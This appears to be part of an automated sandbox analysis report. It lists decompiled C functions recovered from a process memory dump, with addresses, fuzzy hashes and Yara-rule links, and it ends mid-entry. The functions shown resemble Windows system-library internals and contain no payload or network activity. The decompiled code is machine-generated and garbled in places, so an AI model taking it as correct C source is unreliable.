                                                                  0x0493c9a3
                                                                  0x0493c9a3
                                                                  0x049a7cb0
                                                                  0x049a7cb7
                                                                  0x049a7cbb
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049a7cbd
                                                                  0x049a7ce8
                                                                  0x049a7cc5
                                                                  0x049a7cc8
                                                                  0x049a7cca
                                                                  0x049a7cd0
                                                                  0x049a7cd6
                                                                  0x049a7cde
                                                                  0x049a7ce4
                                                                  0x049a7ce4
                                                                  0x049a7cd0
                                                                  0x00000000
                                                                  0x049a7ce8
                                                                  0x0493c990
                                                                  0x00000000

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d1581b097e3757f64e66e28755d6d2083745d47a0bce6adfba1a2f9e3469fd09
                                                                  • Instruction ID: e63568b59995dd2b9e8a198acab43b496ec176835b35900b79531d1e1dbd9181
                                                                  • Opcode Fuzzy Hash: d1581b097e3757f64e66e28755d6d2083745d47a0bce6adfba1a2f9e3469fd09
                                                                  • Instruction Fuzzy Hash: 6C11C231304606ABDB20AFACCD8696B77B5FBC8618F000578E94193750DB20FE24D7D1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 049737F5, Relevance: .1, Instructions: 57COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 87%
                                                                  			E049737F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E04952280(_t6, 0x4a28550);
				}
				_t29 = E0497387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E0494FFB0(0x4a28550, _t27, 0x4a28550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}











                                                                  0x049737fa
                                                                  0x049737fc
                                                                  0x04973805
                                                                  0x04973808
                                                                  0x04973808
                                                                  0x04973814
                                                                  0x04973818
                                                                  0x04973846
                                                                  0x04973848
                                                                  0x0497384b
                                                                  0x0497384b
                                                                  0x04973852
                                                                  0x00000000
                                                                  0x04973854
                                                                  0x04973856
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04973863
                                                                  0x00000000
                                                                  0x04973863
                                                                  0x0497381a
                                                                  0x0497381a
                                                                  0x0497381f
                                                                  0x0497386e
                                                                  0x0497386e
                                                                  0x04973871
                                                                  0x04973873
                                                                  0x04973873
                                                                  0x04973868
                                                                  0x00000000
                                                                  0x04973868
                                                                  0x04973821
                                                                  0x04973826
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04973828
                                                                  0x0497382a
                                                                  0x04973841
                                                                  0x00000000
                                                                  0x04973841

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4c6515ffc11fe8a769407d343af7b8bcaaa0499d2bb98604f94e49ba121596f2
                                                                  • Instruction ID: 36048e497fd3aa9657f8391006121c31e379616161a8647c574199919f55b03f
                                                                  • Opcode Fuzzy Hash: 4c6515ffc11fe8a769407d343af7b8bcaaa0499d2bb98604f94e49ba121596f2
                                                                  • Instruction Fuzzy Hash: 4401C4B2A01611DBD337CB59D940E66BBAADFC5B50715847AEC458B211D738E801D790
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0496002D, Relevance: .1, Instructions: 55COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E0496002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E04957D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E04957D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E04957D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E04957D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}








                                                                  0x04960032
                                                                  0x04960037
                                                                  0x04960043
                                                                  0x049a4b3a
                                                                  0x04960049
                                                                  0x04960049
                                                                  0x04960049
                                                                  0x0496004e
                                                                  0x04960053
                                                                  0x049a4b48
                                                                  0x049a4b5a
                                                                  0x049a4b4a
                                                                  0x049a4b53
                                                                  0x049a4b53
                                                                  0x049a4b5f
                                                                  0x00000000
                                                                  0x049a4b61
                                                                  0x00000000
                                                                  0x049a4b61
                                                                  0x04960059
                                                                  0x04960059
                                                                  0x04960060
                                                                  0x049a4b6f
                                                                  0x049a4b6f
                                                                  0x04960069
                                                                  0x049a4b83
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049a4b90
                                                                  0x049a4b9b
                                                                  0x049a4b9b
                                                                  0x049a4ba4
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049a4baa
                                                                  0x00000000
                                                                  0x0496006f
                                                                  0x0496006f
                                                                  0x00000000
                                                                  0x0496006f
                                                                  0x04960069

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                                  • Instruction ID: 6ad498203f1358e20e0ad26c807a92d4bb4ff52feb4617855420cc1ae9eb456f
                                                                  • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                                  • Instruction Fuzzy Hash: C511E1326016808FE722CB68CA84B3977DDAB40758F1900F1DD068B6A2E3A8F851C3A0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0494766D, Relevance: .1, Instructions: 54COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 94%
                                                                  			E0494766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E0496F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E0496F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L04954620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}










                                                                  0x04947672
                                                                  0x0494767f
                                                                  0x04947689
                                                                  0x049476de
                                                                  0x049476de
                                                                  0x0494768b
                                                                  0x04947691
                                                                  0x04947693
                                                                  0x04947697
                                                                  0x00000000
                                                                  0x04947699
                                                                  0x049476a8
                                                                  0x00000000
                                                                  0x049476aa
                                                                  0x049476ad
                                                                  0x049476b1
                                                                  0x00000000
                                                                  0x049476b3
                                                                  0x049476b3
                                                                  0x049476b5
                                                                  0x049476ba
                                                                  0x049476bc
                                                                  0x049476bc
                                                                  0x049476c0
                                                                  0x00000000
                                                                  0x049476c2
                                                                  0x049476ce
                                                                  0x049476ce
                                                                  0x049476c0
                                                                  0x049476b1
                                                                  0x049476a8
                                                                  0x04947697
                                                                  0x049476d9

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                                  • Instruction ID: 64d3ae0f4e444057fbd8ed82948a5e4d676d95eb8540a16872b96bc672708f5c
                                                                  • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                                  • Instruction Fuzzy Hash: 7801713271011DABD760AEAEDC41E9B77AEFBC47A0B240574B909CB254DB20ED0187A1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04939080, Relevance: .1, Instructions: 53COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 69%
                                                                  			E04939080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x4a285ec;
				E04952280(_t48, 0x4a285ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E0494FFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x4a2538c; // 0x77f06888
					if( *_t84 != 0x4a25388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x4a0f6e8);
						E0498D0E8(0x4a285ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E04A088F5(_t80, _t85, 0x4a25388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x4a286c0; // 0x2907b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x4a286b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E04952280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E04A088F5(0x4a285ec, _t85, 0x4a25388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E0497AFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x4a2b1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x4a284c0;
																			if(_t82 >=  *0x4a284c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E04A09063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E0493922A(_t99);
										_t64 = E04957D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E04A08B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x4a286c0; // 0x2907b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x4a286b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x4a286bc;
													_t87 = 0x4a286b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E04939240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x4a286c4;
												_t87 = 0x4a286c0;
												L27:
												E04969B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E0498D130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x4a25388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x4a2538c = _t51;
						goto L6;
					}
				}
			}




















                                                                  0x04939082
                                                                  0x04939083
                                                                  0x04939084
                                                                  0x04939085
                                                                  0x04939087
                                                                  0x04939096
                                                                  0x04939098
                                                                  0x04939098
                                                                  0x0493909e
                                                                  0x049390a8
                                                                  0x049390e7
                                                                  0x049390e7
                                                                  0x049390aa
                                                                  0x049390b0
                                                                  0x049390b7
                                                                  0x049390bd
                                                                  0x049390dd
                                                                  0x049390e6
                                                                  0x049390bf
                                                                  0x049390bf
                                                                  0x049390c7
                                                                  0x049390cf
                                                                  0x049390f1
                                                                  0x049390f2
                                                                  0x049390f4
                                                                  0x049390f5
                                                                  0x049390f6
                                                                  0x049390f7
                                                                  0x049390f8
                                                                  0x049390f9
                                                                  0x049390fa
                                                                  0x049390fb
                                                                  0x049390fc
                                                                  0x049390fd
                                                                  0x049390fe
                                                                  0x049390ff
                                                                  0x04939100
                                                                  0x04939102
                                                                  0x04939107
                                                                  0x0493910c
                                                                  0x04939110
                                                                  0x04939113
                                                                  0x04939115
                                                                  0x04939136
                                                                  0x0493913f
                                                                  0x04939143
                                                                  0x049937e4
                                                                  0x049937e4
                                                                  0x04939117
                                                                  0x04939117
                                                                  0x0493911d
                                                                  0x00000000
                                                                  0x0493911f
                                                                  0x0493911f
                                                                  0x04939125
                                                                  0x00000000
                                                                  0x04939127
                                                                  0x0493912d
                                                                  0x04939130
                                                                  0x04939134
                                                                  0x04939158
                                                                  0x0493915d
                                                                  0x04939161
                                                                  0x04939168
                                                                  0x04993715
                                                                  0x0493916e
                                                                  0x0493916e
                                                                  0x04939175
                                                                  0x04939177
                                                                  0x0493917e
                                                                  0x0493917f
                                                                  0x04939182
                                                                  0x04939182
                                                                  0x04939187
                                                                  0x04939187
                                                                  0x0493918a
                                                                  0x0493918d
                                                                  0x0493918f
                                                                  0x04939192
                                                                  0x04939195
                                                                  0x04939198
                                                                  0x04939198
                                                                  0x04939198
                                                                  0x0493919a
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0499371f
                                                                  0x04993721
                                                                  0x04993727
                                                                  0x0499372f
                                                                  0x04993733
                                                                  0x04993735
                                                                  0x04993738
                                                                  0x0499373b
                                                                  0x0499373d
                                                                  0x04993740
                                                                  0x00000000
                                                                  0x04993746
                                                                  0x04993746
                                                                  0x04993749
                                                                  0x00000000
                                                                  0x0499374f
                                                                  0x0499374f
                                                                  0x04993751
                                                                  0x04993757
                                                                  0x04993759
                                                                  0x0499375c
                                                                  0x0499375c
                                                                  0x0499375e
                                                                  0x0499375e
                                                                  0x04993761
                                                                  0x04993764
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04993766
                                                                  0x04993768
                                                                  0x049937a3
                                                                  0x049937a3
                                                                  0x049937a5
                                                                  0x049937a7
                                                                  0x049937ad
                                                                  0x049937b0
                                                                  0x049937b2
                                                                  0x049937bc
                                                                  0x049937c2
                                                                  0x049937c2
                                                                  0x049937b2
                                                                  0x04939187
                                                                  0x04939187
                                                                  0x0493918a
                                                                  0x0493918d
                                                                  0x0493918f
                                                                  0x04939192
                                                                  0x04939195
                                                                  0x00000000
                                                                  0x04939195
                                                                  0x00000000
                                                                  0x0499376a
                                                                  0x0499376a
                                                                  0x0499376a
                                                                  0x0499376c
                                                                  0x0499376c
                                                                  0x0499376f
                                                                  0x04993775
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04993777
                                                                  0x04993779
                                                                  0x04993782
                                                                  0x04993787
                                                                  0x04993789
                                                                  0x04993790
                                                                  0x04993790
                                                                  0x0499378b
                                                                  0x0499378b
                                                                  0x0499378b
                                                                  0x04993792
                                                                  0x04993795
                                                                  0x00000000
                                                                  0x04993795
                                                                  0x00000000
                                                                  0x04993779
                                                                  0x04993798
                                                                  0x00000000
                                                                  0x04993798
                                                                  0x00000000
                                                                  0x04993768
                                                                  0x0499379b
                                                                  0x0499379b
                                                                  0x04993751
                                                                  0x04993749
                                                                  0x00000000
                                                                  0x04993740
                                                                  0x049391a0
                                                                  0x049391a3
                                                                  0x049391a9
                                                                  0x049391b0
                                                                  0x00000000
                                                                  0x049391b0
                                                                  0x04939187
                                                                  0x049391b4
                                                                  0x049391b4
                                                                  0x049391bb
                                                                  0x049391c0
                                                                  0x049391c5
                                                                  0x049391c7
                                                                  0x049937da
                                                                  0x049391cd
                                                                  0x049391cd
                                                                  0x049391cd
                                                                  0x049391d2
                                                                  0x049391d5
                                                                  0x04939239
                                                                  0x04939239
                                                                  0x049391d7
                                                                  0x049391db
                                                                  0x049391e1
                                                                  0x049391e7
                                                                  0x049391fd
                                                                  0x04939203
                                                                  0x0493921e
                                                                  0x04939223
                                                                  0x00000000
                                                                  0x04939205
                                                                  0x04939205
                                                                  0x04939208
                                                                  0x0493920c
                                                                  0x04939214
                                                                  0x04939214
                                                                  0x0493920c
                                                                  0x049391e9
                                                                  0x049391e9
                                                                  0x049391ee
                                                                  0x049391f3
                                                                  0x049391f3
                                                                  0x049391f3
                                                                  0x049391e7
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04939134
                                                                  0x04939125
                                                                  0x0493911d
                                                                  0x0493914e
                                                                  0x049390d1
                                                                  0x049390d1
                                                                  0x049390d3
                                                                  0x049390d6
                                                                  0x049390d8
                                                                  0x00000000
                                                                  0x049390d8
                                                                  0x049390cf

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0c876b39870084020299d79b21a9bc23333d1a0f926a4a85b4d66c6884dfe661
                                                                  • Instruction ID: d1e9baaea1928181a6bd2fc50738a43bdf4f8b9a011223f9d668bdba03408b99
                                                                  • Opcode Fuzzy Hash: 0c876b39870084020299d79b21a9bc23333d1a0f926a4a85b4d66c6884dfe661
                                                                  • Instruction Fuzzy Hash: E701F4B2A016009FE3299F08D940B227BA9FB86325F214076E5019B691C3B5FC41CB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 049CC450, Relevance: .1, Instructions: 53COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 46%
                                                                  			E049CC450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E04979910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E049795B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E049795D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E049795D0();
				return L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}






                                                                  0x049cc458
                                                                  0x049cc45d
                                                                  0x049cc466
                                                                  0x049cc468
                                                                  0x049cc469
                                                                  0x049cc46a
                                                                  0x049cc46b
                                                                  0x049cc46e
                                                                  0x049cc46f
                                                                  0x049cc471
                                                                  0x049cc476
                                                                  0x049cc476
                                                                  0x049cc47c
                                                                  0x049cc47e
                                                                  0x049cc480
                                                                  0x049cc480
                                                                  0x049cc483
                                                                  0x049cc484
                                                                  0x049cc486
                                                                  0x049cc488
                                                                  0x049cc48f
                                                                  0x049cc491
                                                                  0x049cc493
                                                                  0x049cc493
                                                                  0x049cc48f
                                                                  0x049cc498
                                                                  0x049cc49e
                                                                  0x049cc4ad
                                                                  0x049cc4ad
                                                                  0x049cc4b2
                                                                  0x049cc4b4
                                                                  0x049cc4cd

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                                  • Instruction ID: a0c3f90656fb97b512f51e965b0ea098be503780e0d7c046cab0e2fa7689626f
                                                                  • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                                  • Instruction Fuzzy Hash: AC0180B2140505BFF721AF65CC80E62BB7DFB94394F108539F51442560CB21BCA0CBA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04A04015, Relevance: .0, Instructions: 49COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 86%
                                                                  			E04A04015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E04952280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E04952280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x4a286ac);
					E0493F900(0x4a286d4, _t28);
					E0494FFB0(0x4a286ac, _t28, 0x4a286ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E0494FFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}







                                                                  0x04a0401a
                                                                  0x04a0401e
                                                                  0x04a04023
                                                                  0x04a04028
                                                                  0x04a04029
                                                                  0x04a0402b
                                                                  0x04a0402f
                                                                  0x04a04043
                                                                  0x04a04046
                                                                  0x04a04051
                                                                  0x04a04057
                                                                  0x04a0405f
                                                                  0x04a04062
                                                                  0x04a04067
                                                                  0x04a0406f
                                                                  0x04a0407c
                                                                  0x04a0407c
                                                                  0x04a0408c
                                                                  0x04a0408c
                                                                  0x04a04097

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1c530a09d67d8f953a54c643bc40a1136cadafe704482851bf28fddf93b6be1c
                                                                  • Instruction ID: ca1e8b0635581bc6c7c50ad855ac03558c65aa07c90f9031daa4467a460a3999
                                                                  • Opcode Fuzzy Hash: 1c530a09d67d8f953a54c643bc40a1136cadafe704482851bf28fddf93b6be1c
                                                                  • Instruction Fuzzy Hash: 840184722416457FE215EF69DD80E13BBACFBC9758B000679B90893A61CB24FD11CBE4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 049F14FB, Relevance: .0, Instructions: 48COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 61%
